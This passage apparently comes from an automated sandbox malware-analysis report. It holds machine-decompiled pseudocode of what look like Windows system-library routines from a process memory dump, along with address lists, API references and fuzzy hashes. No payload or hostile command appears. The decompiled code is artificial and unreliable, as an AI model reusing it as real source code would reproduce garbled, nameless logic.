                                                                                                                                                    									 *(_t341 + 0x10) =  *(_t370 + 8);
                                                                                                                                                    									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
                                                                                                                                                    									goto L39;
                                                                                                                                                    								}
                                                                                                                                                    								asm("rdtsc");
                                                                                                                                                    								L32:
                                                                                                                                                    								 *(_t341 + 0x10) = _t271;
                                                                                                                                                    								 *((intOrPtr*)(_t341 + 0x14)) = 0;
                                                                                                                                                    								goto L34;
                                                                                                                                                    							}
                                                                                                                                                    							_t271 = E0259BCFC();
                                                                                                                                                    							goto L32;
                                                                                                                                                    						}
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push( &_v68);
                                                                                                                                                    						_push(_v16);
                                                                                                                                                    						_push(_t372);
                                                                                                                                                    						_push( &_v60);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_v68 = 0;
                                                                                                                                                    						_v64 = 0;
                                                                                                                                                    						_t314 = E024DF900(_v12);
                                                                                                                                                    						_a4 = _t314;
                                                                                                                                                    						__eflags = _t314;
                                                                                                                                                    						if(_t314 < 0) {
                                                                                                                                                    							goto L49;
                                                                                                                                                    						}
                                                                                                                                                    						_t316 =  *(_t372 + 0x88) >> 1;
                                                                                                                                                    						__eflags = _t316 & 0x00000001;
                                                                                                                                                    						if((_t316 & 0x00000001) == 0) {
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
                                                                                                                                                    							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
                                                                                                                                                    							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
                                                                                                                                                    							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							_t319 =  *((intOrPtr*)(_t372 + 0x68));
                                                                                                                                                    							_t343 =  *(_t372 + 0x8c);
                                                                                                                                                    							_v16 = _t319;
                                                                                                                                                    							__eflags = _t319 + 0xfffffc00 - 0xffc00;
                                                                                                                                                    							if(_t319 + 0xfffffc00 > 0xffc00) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t343;
                                                                                                                                                    							if(_t343 == 0) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                    							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                    							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							_t348 =  *(_t372 + 0x74);
                                                                                                                                                    							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
                                                                                                                                                    							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push( &_v68);
                                                                                                                                                    							 *(_t372 + 0x78) = 0;
                                                                                                                                                    							 *(_t372 + 0x7c) = 0;
                                                                                                                                                    							_push( *(_t370 + 0x80));
                                                                                                                                                    							_t348 =  &_v60;
                                                                                                                                                    							_push(_t372);
                                                                                                                                                    							_push( &_v60);
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_t322 = E024DF938(_v12);
                                                                                                                                                    							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
                                                                                                                                                    							_a4 = _t322;
                                                                                                                                                    							_t323 = _v16;
                                                                                                                                                    							 *(_t370 + 0x100) = _t343;
                                                                                                                                                    							 *(_t370 + 0xd8) = _t343;
                                                                                                                                                    							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
                                                                                                                                                    							 *(_t370 + 0x80) = _t323;
                                                                                                                                                    							 *(_t370 + 0xe8) = _t323;
                                                                                                                                                    							 *(_t370 + 0xf0) = _t343 * _t323;
                                                                                                                                                    							 *(_t370 + 0x5c) = _v12;
                                                                                                                                                    							goto L51;
                                                                                                                                                    						}
                                                                                                                                                    						L18:
                                                                                                                                                    						_a4 = 0xc000000d;
                                                                                                                                                    						goto L49;
                                                                                                                                                    					}
                                                                                                                                                    					_a4 = 0xc0000017;
                                                                                                                                                    					goto L52;
                                                                                                                                                    				}
                                                                                                                                                    				_push(_t340);
                                                                                                                                                    				_push(0x2c);
                                                                                                                                                    				_push( &_v144);
                                                                                                                                                    				_t326 = E024DFDC0(_t340);
                                                                                                                                                    				_a4 = _t326;
                                                                                                                                                    				if(_t326 < _t340) {
                                                                                                                                                    					goto L54;
                                                                                                                                                    				}
                                                                                                                                                    				_push(_t340);
                                                                                                                                                    				_push(0x1c);
                                                                                                                                                    				_push( &_v172);
                                                                                                                                                    				_push(_t340);
                                                                                                                                                    				_t328 = E024DFC18(0xfffffffe);
                                                                                                                                                    				_a4 = _t328;
                                                                                                                                                    				if(_t328 < _t340) {
                                                                                                                                                    					goto L54;
                                                                                                                                                    				}
                                                                                                                                                    				_push(_t340);
                                                                                                                                                    				_push(0x20);
                                                                                                                                                    				_push( &_v100);
                                                                                                                                                    				_push(1);
                                                                                                                                                    				_t330 = E024DFC18(0xfffffffe);
                                                                                                                                                    				_a4 = _t330;
                                                                                                                                                    				if(_t330 < _t340) {
                                                                                                                                                    					goto L54;
                                                                                                                                                    				}
                                                                                                                                                    				_push(_t340);
                                                                                                                                                    				_push(0x30);
                                                                                                                                                    				_push( &_v220);
                                                                                                                                                    				_t332 = E024DFDC0(3);
                                                                                                                                                    				_a4 = _t332;
                                                                                                                                                    				if(_t332 < _t340) {
                                                                                                                                                    					goto L54;
                                                                                                                                                    				}
                                                                                                                                                    				_t334 = E02538001(_t348, _t360, _t370, _t340,  &_v20);
                                                                                                                                                    				_a4 = _t334;
                                                                                                                                                    				if(_t334 < _t340) {
                                                                                                                                                    					goto L54;
                                                                                                                                                    				}
                                                                                                                                                    				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
                                                                                                                                                    				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
                                                                                                                                                    				goto L12;
                                                                                                                                                    			}
                                                                                                                                                    0x0259eb8d
                                                                                                                                                    0x0259eb90
                                                                                                                                                    0x0259ef60
                                                                                                                                                    0x0259ef60
                                                                                                                                                    0x0259ef64
                                                                                                                                                    0x0259ef69
                                                                                                                                                    0x0259ef69
                                                                                                                                                    0x0259ef6e
                                                                                                                                                    0x0259ef6e
                                                                                                                                                    0x0259ef6e
                                                                                                                                                    0x0259ef70
                                                                                                                                                    0x0259ef72
                                                                                                                                                    0x0259ef82
                                                                                                                                                    0x0259ef82
                                                                                                                                                    0x0259ef87
                                                                                                                                                    0x0259ef8e
                                                                                                                                                    0x0259ef8e
                                                                                                                                                    0x0259eb96
                                                                                                                                                    0x0259eb9a
                                                                                                                                                    0x0259ec92
                                                                                                                                                    0x0259ec98
                                                                                                                                                    0x0259ec9a
                                                                                                                                                    0x0259eca0
                                                                                                                                                    0x0259eca4
                                                                                                                                                    0x0259eca7
                                                                                                                                                    0x0259ecab
                                                                                                                                                    0x0259ecae
                                                                                                                                                    0x0259ecb1
                                                                                                                                                    0x0259ee59
                                                                                                                                                    0x0259ee68
                                                                                                                                                    0x0259ee6b
                                                                                                                                                    0x0259ee74
                                                                                                                                                    0x0259ee76
                                                                                                                                                    0x0259ee7a
                                                                                                                                                    0x0259ee7e
                                                                                                                                                    0x0259ee82
                                                                                                                                                    0x0259ee8c
                                                                                                                                                    0x0259ee8c
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee95
                                                                                                                                                    0x0259ee9c
                                                                                                                                                    0x0259eea4
                                                                                                                                                    0x0259eea4
                                                                                                                                                    0x0259eea7
                                                                                                                                                    0x0259eeaa
                                                                                                                                                    0x0259eeac
                                                                                                                                                    0x0259eeae
                                                                                                                                                    0x0259eeb1
                                                                                                                                                    0x0259eeb8
                                                                                                                                                    0x0259eec0
                                                                                                                                                    0x0259eec5
                                                                                                                                                    0x0259eeb1
                                                                                                                                                    0x0259eeca
                                                                                                                                                    0x0259eecb
                                                                                                                                                    0x0259eecc
                                                                                                                                                    0x0259eecd
                                                                                                                                                    0x0259eece
                                                                                                                                                    0x0259eed1
                                                                                                                                                    0x0259eed2
                                                                                                                                                    0x0259eed3
                                                                                                                                                    0x0259eed4
                                                                                                                                                    0x0259eed8
                                                                                                                                                    0x0259eedd
                                                                                                                                                    0x0259eee0
                                                                                                                                                    0x0259eee2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eee4
                                                                                                                                                    0x0259eee4
                                                                                                                                                    0x0259eeea
                                                                                                                                                    0x0259eeec
                                                                                                                                                    0x0259ef2e
                                                                                                                                                    0x0259ef2e
                                                                                                                                                    0x0259ef34
                                                                                                                                                    0x0259ef3a
                                                                                                                                                    0x0259ef40
                                                                                                                                                    0x0259ef42
                                                                                                                                                    0x0259ef48
                                                                                                                                                    0x0259ef4e
                                                                                                                                                    0x0259ef54
                                                                                                                                                    0x0259ef5a
                                                                                                                                                    0x0259ef5d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ef5d
                                                                                                                                                    0x0259eeee
                                                                                                                                                    0x0259eef4
                                                                                                                                                    0x0259eef7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eef9
                                                                                                                                                    0x0259eeff
                                                                                                                                                    0x0259ef04
                                                                                                                                                    0x0259ef06
                                                                                                                                                    0x0259ef06
                                                                                                                                                    0x0259ef0d
                                                                                                                                                    0x0259ef0f
                                                                                                                                                    0x0259ef12
                                                                                                                                                    0x0259ef17
                                                                                                                                                    0x0259ef1b
                                                                                                                                                    0x0259ef1f
                                                                                                                                                    0x0259ef22
                                                                                                                                                    0x0259ef27
                                                                                                                                                    0x0259ef2a
                                                                                                                                                    0x0259ef2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ef2c
                                                                                                                                                    0x0259eee2
                                                                                                                                                    0x0259ecba
                                                                                                                                                    0x0259ecbd
                                                                                                                                                    0x0259ecc3
                                                                                                                                                    0x0259ecc6
                                                                                                                                                    0x0259ecc9
                                                                                                                                                    0x0259ecd2
                                                                                                                                                    0x0259ecd5
                                                                                                                                                    0x0259ece5
                                                                                                                                                    0x0259ece8
                                                                                                                                                    0x0259eceb
                                                                                                                                                    0x0259ecf3
                                                                                                                                                    0x0259ecf9
                                                                                                                                                    0x0259ecfc
                                                                                                                                                    0x0259ed02
                                                                                                                                                    0x0259ed0d
                                                                                                                                                    0x0259ed23
                                                                                                                                                    0x0259ed37
                                                                                                                                                    0x0259ed40
                                                                                                                                                    0x0259ed49
                                                                                                                                                    0x0259ed52
                                                                                                                                                    0x0259ed58
                                                                                                                                                    0x0259ed5c
                                                                                                                                                    0x0259ed67
                                                                                                                                                    0x0259ed6d
                                                                                                                                                    0x0259ed76
                                                                                                                                                    0x0259ed7c
                                                                                                                                                    0x0259ed82
                                                                                                                                                    0x0259ed88
                                                                                                                                                    0x0259ed92
                                                                                                                                                    0x0259ed9b
                                                                                                                                                    0x0259eda7
                                                                                                                                                    0x0259edb3
                                                                                                                                                    0x0259edbf
                                                                                                                                                    0x0259edcb
                                                                                                                                                    0x0259edd2
                                                                                                                                                    0x0259edd9
                                                                                                                                                    0x0259ede2
                                                                                                                                                    0x0259edf2
                                                                                                                                                    0x0259edf9
                                                                                                                                                    0x0259ee14
                                                                                                                                                    0x0259ee1c
                                                                                                                                                    0x0259ee23
                                                                                                                                                    0x0259ee28
                                                                                                                                                    0x0259ee2f
                                                                                                                                                    0x0259ee36
                                                                                                                                                    0x0259ee3f
                                                                                                                                                    0x0259ee48
                                                                                                                                                    0x0259ee4e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ee4e
                                                                                                                                                    0x0259ecd7
                                                                                                                                                    0x0259ecd9
                                                                                                                                                    0x0259ecd9
                                                                                                                                                    0x0259ecdc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ecdc
                                                                                                                                                    0x0259eccb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eccb
                                                                                                                                                    0x0259eba0
                                                                                                                                                    0x0259eba4
                                                                                                                                                    0x0259eba5
                                                                                                                                                    0x0259ebab
                                                                                                                                                    0x0259ebac

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0259ED1C
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0259ED32
                                                                                                                                                      • Part of subcall function 024DF900: LdrInitializeThunk.NTDLL ref: 024DF90E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                    • String ID: 409
                                                                                                                                                    • API String ID: 1404860816-1549806245
                                                                                                                                                    • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                    • Instruction ID: 2012702e8559646384a3328318aa7508db59f4daf1f9254054bb6233bc064eb3
                                                                                                                                                    • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                    • Instruction Fuzzy Hash: CF024CB1900649EFDB15CF65C881BEABBF9FF08300F00856AE99AD7250D734A994CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E0259C371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                    				short _t58;
                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                    				signed char _t63;
                                                                                                                                                    				signed int _t65;
                                                                                                                                                    				signed int _t74;
                                                                                                                                                    				signed int _t75;
                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                    				signed int _t80;
                                                                                                                                                    				signed int _t82;
                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                    				signed int _t89;
                                                                                                                                                    				signed int _t90;
                                                                                                                                                    				intOrPtr* _t91;
                                                                                                                                                    				signed int _t93;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                    
                                                                                                                                                    				_t87 = __edx;
                                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                    				_t80 = _a8;
                                                                                                                                                    				_t57 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                    				if(_t57 <= 0) {
                                                                                                                                                    					_t57 =  *((intOrPtr*)(_t80 + 8));
                                                                                                                                                    				}
                                                                                                                                                    				_t97 = _a4;
                                                                                                                                                    				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
                                                                                                                                                    				_t89 =  *((intOrPtr*)(_t97 + 0x80));
                                                                                                                                                    				_t58 = _a12;
                                                                                                                                                    				_a8 = _t89;
                                                                                                                                                    				if(_t57 != 0x48 || _t58 == 1) {
                                                                                                                                                    					 *((short*)(_t80 + 0x34)) = _t58;
                                                                                                                                                    					 *((intOrPtr*)(_t80 + 0x10)) = E0259BCFC();
                                                                                                                                                    					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
                                                                                                                                                    					__eflags =  *(_t97 + 0x5c);
                                                                                                                                                    					if( *(_t97 + 0x5c) == 0) {
                                                                                                                                                    						goto L25;
                                                                                                                                                    					}
                                                                                                                                                    					_t61 =  *((intOrPtr*)(_t80 + 0x30));
                                                                                                                                                    					__eflags = _t61 - _t89;
                                                                                                                                                    					if(_t61 < _t89) {
                                                                                                                                                    						_t78 = _t61 + _t80;
                                                                                                                                                    						__eflags = _t61 + _t80;
                                                                                                                                                    						E024EDFC0(_t78, 0xff, _t89 - _t61);
                                                                                                                                                    					}
                                                                                                                                                    					_t90 =  *(_t97 + 0xcc);
                                                                                                                                                    					_t63 = _t90 >> 3;
                                                                                                                                                    					__eflags = _t63 & 0x00000001;
                                                                                                                                                    					if((_t63 & 0x00000001) != 0) {
                                                                                                                                                    						_v16 = 2;
                                                                                                                                                    					}
                                                                                                                                                    					_t82 =  *(_t97 + 0xc8);
                                                                                                                                                    					__eflags = _t82;
                                                                                                                                                    					if(_t82 <= 0) {
                                                                                                                                                    						L18:
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_t91 = _t97 + 0xf0;
                                                                                                                                                    						_push(_t91);
                                                                                                                                                    						_push(_a8);
                                                                                                                                                    						_push(_t80);
                                                                                                                                                    						_push( &_v24);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_t65 = E024DF938( *(_t97 + 0x5c));
                                                                                                                                                    						_v8 = _t65;
                                                                                                                                                    						__eflags = _t65;
                                                                                                                                                    						if(_t65 < 0) {
                                                                                                                                                    							__eflags = _t65 - 0x80000022;
                                                                                                                                                    							if(_t65 == 0x80000022) {
                                                                                                                                                    								goto L25;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _v8 - 2;
                                                                                                                                                    							if(_v8 == 2) {
                                                                                                                                                    								goto L25;
                                                                                                                                                    							}
                                                                                                                                                    							goto L24;
                                                                                                                                                    						}
                                                                                                                                                    						 *_t91 =  *_t91 + _a8;
                                                                                                                                                    						asm("adc dword [edi+0x4], 0x0");
                                                                                                                                                    						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
                                                                                                                                                    						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
                                                                                                                                                    						goto L25;
                                                                                                                                                    					} else {
                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                    						asm("cdq");
                                                                                                                                                    						_v12 = E0250F1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
                                                                                                                                                    						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
                                                                                                                                                    						_t75 = _t74 * _a8;
                                                                                                                                                    						__eflags = _t74 * _a8 >> 0x20 - _t87;
                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                    							goto L18;
                                                                                                                                                    						}
                                                                                                                                                    						if(__eflags > 0) {
                                                                                                                                                    							L14:
                                                                                                                                                    							_t93 = (_t90 & 0x0000000b) - 1;
                                                                                                                                                    							__eflags = _t93;
                                                                                                                                                    							if(_t93 == 0) {
                                                                                                                                                    								_v8 = 0xc0000188;
                                                                                                                                                    								L24:
                                                                                                                                                    								_t54 = _t97 + 0xfc;
                                                                                                                                                    								 *_t54 =  *(_t97 + 0xfc) + 1;
                                                                                                                                                    								__eflags =  *_t54;
                                                                                                                                                    								goto L25;
                                                                                                                                                    							}
                                                                                                                                                    							_t94 = _t93 - 1;
                                                                                                                                                    							__eflags = _t94;
                                                                                                                                                    							if(_t94 == 0) {
                                                                                                                                                    								_t76 = _t97 + 0xe8;
                                                                                                                                                    								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
                                                                                                                                                    								_t86 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                    								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                    								 *((intOrPtr*)(_t97 + 0xd8)) = E02524FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
                                                                                                                                                    							} else {
                                                                                                                                                    								__eflags = _t94 == 6;
                                                                                                                                                    								if(_t94 == 6) {
                                                                                                                                                    									_t34 = _t97 + 0xd4;
                                                                                                                                                    									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
                                                                                                                                                    									__eflags =  *_t34;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							goto L18;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _t75 - _v12;
                                                                                                                                                    						if(_t75 < _v12) {
                                                                                                                                                    							goto L18;
                                                                                                                                                    						}
                                                                                                                                                    						goto L14;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					_v8 = 0x80000022;
                                                                                                                                                    					L25:
                                                                                                                                                    					return _v8;
                                                                                                                                                    				}
                                                                                                                                                    			}

























APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0259C4BC
Strings
Memory Dump Source
• Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
• Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: "$409
• API String ID: 885266447-4048699559
• Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
• Instruction ID: 9471c11f1d348b5594d4139b088ebf56feaac084508831a5db48611111b5c53a
• Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
• Instruction Fuzzy Hash: 494180B1600705EFDF24CF64C884BBABBB5FF49306F14885AE85A9B241D774E944CB58
Uniqueness

Uniqueness Score: -1.00%